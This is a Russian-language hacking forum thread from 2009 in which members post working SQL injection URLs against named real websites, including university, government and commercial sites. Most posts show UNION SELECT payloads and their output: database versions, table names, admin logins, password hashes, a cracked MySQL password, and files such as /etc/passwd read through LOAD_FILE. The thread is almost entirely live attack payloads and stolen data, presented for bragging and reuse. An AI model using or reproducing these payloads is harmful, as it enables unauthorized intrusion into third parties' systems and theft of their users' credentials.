HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.02.2009, 22:48
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
С нами: 9459019

Репутация: 348
По умолчанию

Код:
http://www.vavilon.info/commodity.php?commid=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10--
u23474@78.108.84.11:5.0.67:b23474
PR:1
Код:
http://www.vavilon.info/commodity.php?commid=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+information_schema.tables+limit+0,1--
Код:
http://www.vavilon.info/commodity.php?commid=-1+union+select+1,2,3,4,concat(name,0x3a,password),6,7,8,9,10+from+users--
gold:569874123

p.s/ админку ненашел,а точнее толком неискал
p.s.s вобще студия делает сайты на дырявой cms,там админка во всех по адресу /admin
 
Ответить с цитированием

  #2  
Старый 18.02.2009, 22:55
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Код:
http://www.flightweb.com/filemgmt/singlefile.php?lid=-7+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--
5.0.67-log
 
Ответить с цитированием

  #3  
Старый 18.02.2009, 23:03
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

http://www.tabeleelectronice.ro/detail.php?id=-701+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,versio n(),database(),user()),8,9,10,11,12,13,14,15,16,17 ,18&idcat=138





Database Version: 4.1.22-standard
Database name: radu_tabele
User name: radu_cips@localhost
 
Ответить с цитированием

  #4  
Старый 18.02.2009, 23:21
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
С нами: 9129884

Репутация: 240
По умолчанию

http://www.trade.gov.cn/selloffers.php?cid=272+union+select+1,2,version(), 4,5,6,7,8,9,10

Database Version: 5.0.45-log
Database name: trade_ec_b2b_export
User name: trade_ec@192.168.100.10
 
Ответить с цитированием

  #5  
Старый 18.02.2009, 23:50
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
С нами: 9314306

Репутация: 325
По умолчанию

cfs.bc.ca - PR6
Код:
http://www.cfs.bc.ca/general.php?id=-15+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11/*
DB_Ver:5.0.45-log
DB_User:cfsbc_2005@localhost
DB:cfsbc_2005
Админка:
Код:
http://www.cfs.bc.ca/admin/
прочитал все что было мне в бд доступно, но пользователей не нашел

================================================== =======================

cjsf.ca - PR5
Код:
http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9--
DB_Ver:5.1.28-rc
DB_User: php@localhost
DB:cjsfsite
mysql.user
Код:
http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+concat_ws(0x3a,user,password),2,3,4,5,6,7,8,9+from+mysql.user--
root:474b96d173b7c3b8
Читаем /etc/passwd
Код:
http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764),2,3,4,5,6,7,8,9--
Админка тут(но как видим basic аторизация)
Код:
http://www.cjsf.ca/admin/
Сейчас поправим наше положение =) мы знаем где админка и знаем что нужно посмотреть где находится файл с паролями, а он в свою очередь прописан в .htaccess:
Код:
http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+LOAD_FILE(0x2f7573722f7765622f636a73662f61646d696e2f2e6874616363657373),2,3,4,5,6,7,8,9--
Видим что наш файл по адресу:
/usr/local/etc/apache22/htusers
Читаем:
Код:
http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+LOAD_FILE(0x2f7573722f6c6f63616c2f6574632f61706163686532322f68747573657273),2,3,4,5,6,7,8,9--
И видим:
cjsf:E4DngOk3FmdhI
Вроде все =)

Последний раз редактировалось Kraneg; 19.02.2009 в 00:57..
 
Ответить с цитированием

  #6  
Старый 19.02.2009, 01:56
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
С нами: 9116712

Репутация: 688
По умолчанию

PR - 6

Код:
http://www.wearewhatwedo.org/news/display.php?id=-1+union+select+1,concat _ws(0x3a,version(),database(), user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Database Version : 5.0.45
Database name : wawwd_main
User name : wawwd_main@localhost


берем юзверей:

Код:
http://www.wearewhatwedo.org/news/display.php?id=-1+union+select+1,concat _ws(0x3a ,id,email,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+iLogin+limit+0,1--
и админа:

Код:
http://www.wearewhatwedo.org/news/display.php?id=-1+union+select+1,concat _ws(0x3a, id,admin_user_name,admin_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+nmail_admin+limit+0,1--
админку не нашёл
 
Ответить с цитированием

  #7  
Старый 19.02.2009, 03:47
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами: 9644530

Репутация: 443
По умолчанию

PageRank = 7


Цитата:
http://www.pace.edu/page.cfm?doc_id=8005%20or%201=@@version--
Microsoft SQL Server 2005 - 9.00.3282.00 (X64) Aug 5 2008 00:48:00 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.0 (Build 6001: Service Pack 1


Цитата:
http://www.pace.edu/page.cfm?doc_id=8005%20and%20db_name()%3E0--%20and%201=1
Current database is : EmpowerCMS


Цитата:
http://www.pace.edu/page.cfm?doc_id=8005%20and%20user%3E0--%20and%201=1
Current User : webmaster






Цитата:
http://www.colby.edu/news_events/calendar/eventview.cfm?rID=57041&bID=486591%20or%201=@@vers ion--

Microsoft SQL Server 2000 - 8.00.2050 (Intel X86)
Mar 7 2008 21:29:56
Copyright (c) 1988-2003 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)





Цитата:
http://www.colby.edu/news_events/calendar/eventview.cfm?rID=57041&bID=486591%20and%20db_name ()%3E0--%20and%201=1
Db Name : EMS



Цитата:
http://www.colby.edu/news_events/calendar/eventview.cfm?rID=57041&bID=486591%20and%20user%3E 0--%20and%201=1
Current User : ODBC_User

Последний раз редактировалось spherics; 19.02.2009 в 03:57..
 
Ответить с цитированием

  #8  
Старый 19.02.2009, 09:03
R3b
Новичок
Регистрация: 19.01.2009
Сообщений: 2
С нами: 9109898

Репутация: 5
По умолчанию

http://www.dib.ucg.gr/proswpiko_en.php?id=102+union+select+null,null,nul l,null,concat_ws(0x20,user(),database(),version()) ,null,null,null,null,null,null,null,null,null,null/*
 
Ответить с цитированием

  #9  
Старый 19.02.2009, 14:59
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами: 9838057

Репутация: 302
По умолчанию

Код:
http://islamnasledie.ru/news.php?id=-1372%20union%20select%201,2,3,4,group_concat(table_name),6,7,8,9,10,11,12%20from%20information_schema.tables--
(все таблицы)


Код:
http://islamnasledie.ru/news.php?id=-1372%20union%20select%201,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10,11,12%20from%20auth--
(админские данные)


Код:
http://islamnasledie.ru/admin
(Админка)



admin:269b9cbb1485e341 (Логин:П ароль)

PS: Че за кодировка у пароля?? Подскажите пожалуйста. С меня +
 
Ответить с цитированием

  #10  
Старый 19.02.2009, 16:00
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами: 9837719

Репутация: 466
По умолчанию

http://www.petazon.com/cat.php?niccer=124+union+select+1,22222,3,4,5,6666 6,7,8,9999,10,11+limit+1,1/*

Database Version: 4.0.27-standard
Database name: petazon_pet
User name: petazon_pet@localhost

http://www.pristinemodels.dk/page.php?id=-2+union+select+1,version(),3/*

Database Version: 5.0.32-Debian_7etch8-log
Database name: pristinemodels_
User name: pristinemodels_@srv82.one.com


2 Assembler

хэш MySQL:269b9cbb1485e341:RoSin28

Последний раз редактировалось Rubaka; 19.02.2009 в 16:03..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.